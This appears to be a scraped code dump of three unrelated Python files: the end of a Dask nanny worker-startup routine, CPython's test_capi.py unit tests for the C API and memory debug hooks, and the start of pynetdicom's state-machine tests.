t = threading.Thread(target=watch_stop_q, name="Nanny stop queue watch")
t.daemon = True
t.start()
async def run():
"""
Try to start worker and inform parent of outcome.
"""
try:
await worker
except Exception as e:
logger.exception("Failed to start worker")
init_result_q.put({"uid": uid, "exception": e})
init_result_q.close()
# If we hit an exception here we need to wait for a least
# one interval for the outside to pick up this message.
# Otherwise we arrive in a race condition where the process
# cleanup wipes the queue before the exception can be
# properly handled. See also
# WorkerProcess._wait_until_connected (the 2 is for good
# measure)
sync_sleep(cls._init_msg_interval * 2)
else:
try:
assert worker.address
except ValueError:
pass
else:
init_result_q.put(
{
"address": worker.address,
"dir": worker.local_directory,
"uid": uid,
}
)
init_result_q.close()
await worker.finished()
logger.info("Worker closed")
except Exception as e:
logger.exception("Failed to initialize Worker")
init_result_q.put({"uid": uid, "exception": e})
init_result_q.close()
# If we hit an exception here we need to wait for a least one
# interval for the outside to pick up this message. Otherwise we
# arrive in a race condition where the process cleanup wipes the
# queue before the exception can be properly handled. See also
# WorkerProcess._wait_until_connected (the 2 is for good measure)
sync_sleep(cls._init_msg_interval * 2)
else:
try:
loop.run_sync(run)
except (TimeoutError, gen.TimeoutError):
# Loop was stopped before wait_until_closed() returned, ignore
pass
except KeyboardInterrupt:
# At this point the loop is not running thus we have to run
# do_stop() explicitly.
loop.run_sync(do_stop)
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import namedtuple
import os
import pickle
import platform
import random
import re
import subprocess
import sys
import sysconfig
import textwrap
import threading
import time
import unittest
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support.script_helper import assert_python_failure, assert_python_ok
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error:'
b' PyThreadState_Get: no current thread'))
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
self.assertEqual(_testcapi.no_docstring.__text_signature__, None)
self.assertEqual(_testcapi.docstring_empty.__doc__, None)
self.assertEqual(_testcapi.docstring_empty.__text_signature__, None)
self.assertEqual(_testcapi.docstring_no_signature.__doc__,
"This docstring has no signature.")
self.assertEqual(_testcapi.docstring_no_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__doc__,
"docstring_with_invalid_signature($module, /, boo)\n"
"\n"
"This docstring has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__doc__,
"docstring_with_invalid_signature2($module, /, boo)\n"
"\n"
"--\n"
"\n"
"This docstring also has an invalid signature."
)
self.assertEqual(_testcapi.docstring_with_invalid_signature2.__text_signature__, None)
self.assertEqual(_testcapi.docstring_with_signature.__doc__,
"This docstring has a valid signature.")
self.assertEqual(_testcapi.docstring_with_signature.__text_signature__, "($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__doc__, None)
self.assertEqual(_testcapi.docstring_with_signature_but_no_doc.__text_signature__,
"($module, /, sig)")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__doc__,
"\nThis docstring has a valid signature and some extra newlines.")
self.assertEqual(_testcapi.docstring_with_signature_and_extra_newlines.__text_signature__,
"($module, /, parameter)")
def test_c_type_with_matrix_multiplication(self):
M = _testcapi.matmulType
m1 = M()
m2 = M()
self.assertEqual(m1 @ m2, ("matmul", m1, m2))
self.assertEqual(m1 @ 42, ("matmul", m1, 42))
self.assertEqual(42 @ m1, ("matmul", 42, m1))
o = m1
o @= m2
self.assertEqual(o, ("imatmul", m1, m2))
o = m1
o @= 42
self.assertEqual(o, ("imatmul", m1, 42))
o = 42
o @= m1
self.assertEqual(o, ("matmul", 42, m1))
def test_return_null_without_error(self):
# Issue #23571: A function must not return NULL without setting an
# error
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_null_without_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned NULL '
br'without setting an error\n'
br'SystemError: <built-in function '
br'return_null_without_error> returned NULL '
br'without setting an error\n'
br'\n'
br'Current thread.*:\n'
br' File .*", line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_null_without_error()
self.assertRegex(str(cm.exception),
'return_null_without_error.* '
'returned NULL without setting an error')
def test_return_result_with_error(self):
# Issue #23571: A function must not return a result with an error set
if Py_DEBUG:
code = textwrap.dedent("""
import _testcapi
from test import support
with support.SuppressCrashReport():
_testcapi.return_result_with_error()
""")
rc, out, err = assert_python_failure('-c', code)
self.assertRegex(err.replace(b'\r', b''),
br'Fatal Python error: a function returned a '
br'result with an error set\n'
br'ValueError\n'
br'\n'
br'The above exception was the direct cause '
br'of the following exception:\n'
br'\n'
br'SystemError: <built-in '
br'function return_result_with_error> '
br'returned a result with an error set\n'
br'\n'
br'Current thread.*:\n'
br' File .*, line 6 in <module>')
else:
with self.assertRaises(SystemError) as cm:
_testcapi.return_result_with_error()
self.assertRegex(str(cm.exception),
'return_result_with_error.* '
'returned a result with an error set')
def test_buildvalue_N(self):
_testcapi.test_buildvalue_N()
def test_set_nomemory(self):
code = """if 1:
import _testcapi
class C(): pass
# The first loop tests both functions and that remove_mem_hooks()
# can be called twice in a row. The second loop checks a call to
# set_nomemory() after a call to remove_mem_hooks(). The third
# loop checks the start and stop arguments of set_nomemory().
for outer_cnt in range(1, 4):
start = 10 * outer_cnt
for j in range(100):
if j == 0:
if outer_cnt != 3:
_testcapi.set_nomemory(start)
else:
_testcapi.set_nomemory(start, start + 1)
try:
C()
except MemoryError as e:
if outer_cnt != 3:
_testcapi.remove_mem_hooks()
print('MemoryError', outer_cnt, j)
_testcapi.remove_mem_hooks()
break
"""
rc, out, err = assert_python_ok('-c', code)
self.assertIn(b'MemoryError 1 10', out)
self.assertIn(b'MemoryError 2 20', out)
self.assertIn(b'MemoryError 3 30', out)
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with support.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
# Bug #6012
class Test6012(unittest.TestCase):
def test(self):
self.assertEqual(_testcapi.argparsing("Hello", "World"), 1)
class EmbeddingTests(unittest.TestCase):
def setUp(self):
here = os.path.abspath(__file__)
basepath = os.path.dirname(os.path.dirname(os.path.dirname(here)))
exename = "_testembed"
if sys.platform.startswith("win"):
ext = ("_d" if "_d" in sys.executable else "") + ".exe"
exename += ext
exepath = os.path.dirname(sys.executable)
else:
exepath = os.path.join(basepath, "Programs")
self.test_exe = exe = os.path.join(exepath, exename)
if not os.path.exists(exe):
self.skipTest("%r doesn't exist" % exe)
# This is needed otherwise we get a fatal error:
# "Py_Initialize: Unable to get the locale encoding
# LookupError: no codec search functions registered: can't find encoding"
self.oldcwd = os.getcwd()
os.chdir(basepath)
def tearDown(self):
os.chdir(self.oldcwd)
def run_embedded_interpreter(self, *args, env=None):
"""Runs a test in the embedded interpreter"""
cmd = [self.test_exe]
cmd.extend(args)
if env is not None and sys.platform == 'win32':
# Windows requires at least the SYSTEMROOT environment variable to
# start Python.
env = env.copy()
env['SYSTEMROOT'] = os.environ['SYSTEMROOT']
p = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
env=env)
(out, err) = p.communicate()
self.assertEqual(p.returncode, 0,
"bad returncode %d, stderr is %r" %
(p.returncode, err))
return out, err
def run_repeated_init_and_subinterpreters(self):
out, err = self.run_embedded_interpreter("repeated_init_and_subinterpreters")
self.assertEqual(err, "")
# The output from _testembed looks like this:
# --- Pass 0 ---
# interp 0 <0x1cf9330>, thread state <0x1cf9700>: id(modules) = 139650431942728
# interp 1 <0x1d4f690>, thread state <0x1d35350>: id(modules) = 139650431165784
# interp 2 <0x1d5a690>, thread state <0x1d99ed0>: id(modules) = 139650413140368
# interp 3 <0x1d4f690>, thread state <0x1dc3340>: id(modules) = 139650412862200
# interp 0 <0x1cf9330>, thread state <0x1cf9700>: id(modules) = 139650431942728
# --- Pass 1 ---
# ...
interp_pat = (r"^interp (\d+) <(0x[\dA-F]+)>, "
r"thread state <(0x[\dA-F]+)>: "
r"id\(modules\) = ([\d]+)$")
Interp = namedtuple("Interp", "id interp tstate modules")
numloops = 0
current_run = []
for line in out.splitlines():
if line == "--- Pass {} ---".format(numloops):
self.assertEqual(len(current_run), 0)
if support.verbose:
print(line)
numloops += 1
continue
self.assertLess(len(current_run), 5)
match = re.match(interp_pat, line)
if match is None:
self.assertRegex(line, interp_pat)
# Parse the line from the loop. The first line is the main
# interpreter and the 3 afterward are subinterpreters.
interp = Interp(*match.groups())
if support.verbose:
print(interp)
self.assertTrue(interp.interp)
self.assertTrue(interp.tstate)
self.assertTrue(interp.modules)
current_run.append(interp)
# The last line in the loop should be the same as the first.
if len(current_run) == 5:
main = current_run[0]
self.assertEqual(interp, main)
yield current_run
current_run = []
def test_subinterps_main(self):
for run in self.run_repeated_init_and_subinterpreters():
main = run[0]
self.assertEqual(main.id, '0')
def test_subinterps_different_ids(self):
for run in self.run_repeated_init_and_subinterpreters():
main, *subs, _ = run
mainid = int(main.id)
for i, sub in enumerate(subs):
self.assertEqual(sub.id, str(mainid + i + 1))
def test_subinterps_distinct_state(self):
for run in self.run_repeated_init_and_subinterpreters():
main, *subs, _ = run
if '0x0' in main:
# XXX Fix on Windows (and other platforms): something
# is going on with the pointers in Programs/_testembed.c.
# interp.interp is 0x0 and interp.modules is the same
# between interpreters.
raise unittest.SkipTest('platform prints pointers as 0x0')
for sub in subs:
# A new subinterpreter may have the same
# PyInterpreterState pointer as a previous one if
# the earlier one has already been destroyed. So
# we compare with the main interpreter. The same
# applies to tstate.
self.assertNotEqual(sub.interp, main.interp)
self.assertNotEqual(sub.tstate, main.tstate)
self.assertNotEqual(sub.modules, main.modules)
def test_forced_io_encoding(self):
# Checks forced configuration of embedded interpreter IO streams
env = dict(os.environ, PYTHONIOENCODING="utf-8:surrogateescape")
out, err = self.run_embedded_interpreter("forced_io_encoding", env=env)
if support.verbose > 1:
print()
print(out)
print(err)
expected_stream_encoding = "utf-8"
expected_errors = "surrogateescape"
expected_output = '\n'.join([
"--- Use defaults ---",
"Expected encoding: default",
"Expected errors: default",
"stdin: {in_encoding}:{errors}",
"stdout: {out_encoding}:{errors}",
"stderr: {out_encoding}:backslashreplace",
"--- Set errors only ---",
"Expected encoding: default",
"Expected errors: ignore",
"stdin: {in_encoding}:ignore",
"stdout: {out_encoding}:ignore",
"stderr: {out_encoding}:backslashreplace",
"--- Set encoding only ---",
"Expected encoding: latin-1",
"Expected errors: default",
"stdin: latin-1:{errors}",
"stdout: latin-1:{errors}",
"stderr: latin-1:backslashreplace",
"--- Set encoding and errors ---",
"Expected encoding: latin-1",
"Expected errors: replace",
"stdin: latin-1:replace",
"stdout: latin-1:replace",
"stderr: latin-1:backslashreplace"])
expected_output = expected_output.format(
in_encoding=expected_stream_encoding,
out_encoding=expected_stream_encoding,
errors=expected_errors)
# This is useful if we ever trip over odd platform behaviour
self.maxDiff = None
self.assertEqual(out.strip(), expected_output)
class SkipitemTest(unittest.TestCase):
def test_skipitem(self):
"""
If this test failed, you probably added a new "format unit"
in Python/getargs.c, but neglected to update our poor friend
skipitem() in the same file. (If so, shame on you!)
With a few exceptions**, this function brute-force tests all
printable ASCII*** characters (32 to 126 inclusive) as format units,
checking to see that PyArg_ParseTupleAndKeywords() return consistent
errors both when the unit is attempted to be used and when it is
skipped. If the format unit doesn't exist, we'll get one of two
specific error messages (one for used, one for skipped); if it does
exist we *won't* get that error--we'll get either no error or some
other error. If we get the specific "does not exist" error for one
test and not for the other, there's a mismatch, and the test fails.
** Some format units have special funny semantics and it would
be difficult to accommodate them here. Since these are all
well-established and properly skipped in skipitem() we can
get away with not testing them--this test is really intended
to catch *new* format units.
*** Python C source files must be ASCII. Therefore it's impossible
to have non-ASCII format units.
"""
empty_tuple = ()
tuple_1 = (0,)
dict_b = {'b':1}
keywords = ["a", "b"]
for i in range(32, 127):
c = chr(i)
# skip parentheses, the error reporting is inconsistent about them
# skip 'e', it's always a two-character code
# skip '|' and '$', they don't represent arguments anyway
if c in '()e|$':
continue
# test the format unit when not skipped
format = c + "i"
try:
_testcapi.parse_tuple_and_keywords(tuple_1, dict_b,
format, keywords)
when_not_skipped = False
except SystemError as e:
s = "argument 1 (impossible<bad format char>)"
when_not_skipped = (str(e) == s)
except TypeError:
when_not_skipped = False
# test the format unit when skipped
optional_format = "|" + format
try:
_testcapi.parse_tuple_and_keywords(empty_tuple, dict_b,
optional_format, keywords)
when_skipped = False
except SystemError as e:
s = "impossible<bad format char>: '{}'".format(format)
when_skipped = (str(e) == s)
message = ("test_skipitem_parity: "
"detected mismatch between convertsimple and skipitem "
"for format unit '{}' ({}), not skipped {}, skipped {}".format(
c, i, when_skipped, when_not_skipped))
self.assertIs(when_skipped, when_not_skipped, message)
def test_parse_tuple_and_keywords(self):
# Test handling errors in the parse_tuple_and_keywords helper itself
self.assertRaises(TypeError, _testcapi.parse_tuple_and_keywords,
(), {}, 42, [])
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, '', 42)
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, '', [''] * 42)
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, '', [42])
def test_bad_use(self):
# Test handling invalid format and keywords in
# PyArg_ParseTupleAndKeywords()
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(1,), {}, '||O', ['a'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(1, 2), {}, '|O|O', ['a', 'b'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {'a': 1}, '$$O', ['a'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {'a': 1, 'b': 2}, '$O$O', ['a', 'b'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {'a': 1}, '$|O', ['a'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {'a': 1, 'b': 2}, '$O|O', ['a', 'b'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(1,), {}, '|O', ['a', 'b'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(1,), {}, '|OO', ['a'])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {}, '|$O', [''])
self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
(), {}, '|OO', ['a', ''])
def test_positional_only(self):
parse = _testcapi.parse_tuple_and_keywords
parse((1, 2, 3), {}, 'OOO', ['', '', 'a'])
parse((1, 2), {'a': 3}, 'OOO', ['', '', 'a'])
with self.assertRaisesRegex(TypeError,
r'function takes at least 2 positional arguments \(1 given\)'):
parse((1,), {'a': 3}, 'OOO', ['', '', 'a'])
parse((1,), {}, 'O|OO', ['', '', 'a'])
with self.assertRaisesRegex(TypeError,
r'function takes at least 1 positional arguments \(0 given\)'):
parse((), {}, 'O|OO', ['', '', 'a'])
parse((1, 2), {'a': 3}, 'OO$O', ['', '', 'a'])
with self.assertRaisesRegex(TypeError,
r'function takes exactly 2 positional arguments \(1 given\)'):
parse((1,), {'a': 3}, 'OO$O', ['', '', 'a'])
parse((1,), {}, 'O|O$O', ['', '', 'a'])
with self.assertRaisesRegex(TypeError,
r'function takes at least 1 positional arguments \(0 given\)'):
parse((), {}, 'O|O$O', ['', '', 'a'])
with self.assertRaisesRegex(SystemError, r'Empty parameter name after \$'):
parse((1,), {}, 'O|$OO', ['', '', 'a'])
with self.assertRaisesRegex(SystemError, 'Empty keyword'):
parse((1,), {}, 'O|OO', ['', 'a', ''])
class TestThreadState(unittest.TestCase):
@support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
def test__testcapi(self):
for name in dir(_testcapi):
if name.startswith('test_'):
with self.subTest("internal", name=name):
test = getattr(_testcapi, name)
test()
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
with support.SuppressCrashReport():
out = assert_python_failure('-c', code,
PYTHONMALLOC=self.PYTHONMALLOC)
stderr = out.err
return stderr.decode('ascii', 'replace')
def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfb\n"
r" at tail\+2: 0xfb\n"
r" .*\n"
r" The block was made by call #[0-9]+ to debug malloc/realloc.\n"
r" Data at p: cb cb cb .*\n"
r"\n"
r"Fatal Python error: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r" The block was made by call #[0-9]+ to debug malloc/realloc.\n"
r" Data at p: cb cb cb .*\n"
r"\n"
r"Fatal Python error: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: Python memory allocator called '
'without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(sysconfig.get_config_var('WITH_PYMALLOC') == 1,
'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
if __name__ == "__main__":
unittest.main()
|
test_fsm.py
|
"""Unit tests for fsm.py"""
import datetime
import logging
import select
import socket
from struct import pack
import sys
import threading
import time
import pytest
from pynetdicom import AE, build_context, evt, debug_logger
from pynetdicom.association import Association
from pynetdicom import fsm as FINITE_STATE
from pynetdicom.fsm import *
from pynetdicom.dimse_primitives import C_ECHO
from pynetdicom.pdu_primitives import (
A_ASSOCIATE, A_ABORT, A_P_ABORT, P_DATA, A_RELEASE,
MaximumLengthNotification, ImplementationClassUIDNotification
)
from pynetdicom.pdu import A_RELEASE_RQ
from pynetdicom.sop_class import VerificationSOPClass
from pynetdicom.transport import AssociationSocket
from pynetdicom.utils import validate_ae_title
from .encoded_pdu_items import (
a_associate_ac, a_associate_rq, a_associate_rj, p_data_tf, a_abort,
a_release_rq, a_release_rp,
)
from .parrot import ThreadedParrot
#debug_logger()
REFERENCE_BAD_EVENTS = [
# Event, bad states
("Evt1", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE (rq) p
("Evt2", [1, 2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Connection available
("Evt3", [1, 4]), # A-ASSOCIATE-AC PDU recv
("Evt4", [1, 4]), # A-ASSOCIATE-RJ PDU recv
("Evt5", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Connection open
("Evt6", [1, 4]), # A-ASSOCIATE-RQ PDU recv
("Evt7", [1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE (ac) p
("Evt8", [1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE (rj) p
("Evt9", [1, 2, 3, 4, 5, 7, 9, 10, 11, 12, 13]), # P-DATA primitive
("Evt10", [1, 4]), # P-DATA-TF PDU
("Evt11", [1, 2, 3, 4, 5, 7, 8, 9, 10, 11, 12, 13]), # A-RELEASE (rq) p
("Evt12", [1, 4]), # A-RELEASE-RQ PDU recv
("Evt13", [1, 4]), # A-RELEASE-RP PDU recv
("Evt14", [1, 2, 3, 4, 5, 6, 7, 10, 11, 13]), # A-RELEASE (rsp) primitive
("Evt15", [1, 2, 13]), # A-ABORT (rq) primitive
("Evt16", [1, 4]), # A-ABORT PDU recv
("Evt17", [1]), # Connection closed
("Evt18", [1, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]), # ARTIM expired
("Evt19", [1, 4]), # Unrecognised PDU rev
]
REFERENCE_GOOD_EVENTS = [
# Event, good states
("Evt1", [1]), # A-ASSOCIATE (rq) p
("Evt2", [4]), # Connection available
("Evt3", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE-AC PDU recv
("Evt4", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE-RJ PDU recv
("Evt5", [1]), # Connection open
("Evt6", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ASSOCIATE-RQ PDU recv
("Evt7", [3]), # A-ASSOCIATE (ac) p
("Evt8", [3]), # A-ASSOCIATE (rj) p
("Evt9", [6, 8]), # P-DATA primitive
("Evt10", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # P-DATA-TF PDU
("Evt11", [6]), # A-RELEASE (rq) p
("Evt12", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-RELEASE-RQ PDU recv
("Evt13", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-RELEASE-RP PDU recv
("Evt14", [8, 9, 12]), # A-RELEASE (rsp) primitive
("Evt15", [3, 4, 5, 6, 7, 8, 9, 10, 11, 12]), # A-ABORT (rq) primitive
("Evt16", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # A-ABORT PDU recv
("Evt17", [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Connection closed
("Evt18", [2, 13]), # ARTIM expired
("Evt19", [2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13]), # Unrecognised PDU rev
]
class BadDUL:
"""A DUL that always raises an exception during actions."""
def __init__(self):
self.is_killed = False
def kill_dul(self):
"""Hook for testing whether DUL got killed."""
self.is_killed = True
@property
def primitive(self):
"""Prevent StateMachine from setting primitive."""
return None
class TestStateMachine:
"""Non-functional unit tests for fsm.StateMachine."""
def test_init(self):
"""Test creation of new StateMachine."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
assert fsm.current_state == 'Sta1'
assert fsm.dul == assoc.dul
def test_invalid_transition_raises(self):
"""Test StateMachine.transition using invalid states raises."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
msg = r"Invalid state 'Sta0' for State Machine"
with pytest.raises(ValueError, match=msg):
fsm.transition('Sta0')
def test_valid_transition(self):
"""Test StateMachine.transition using valid states."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = assoc.dul.state_machine
for ii in range(1, 14):
assert 1 <= ii <= 13
fsm.transition("Sta{}".format(ii))
assert fsm.current_state == "Sta{}".format(ii)
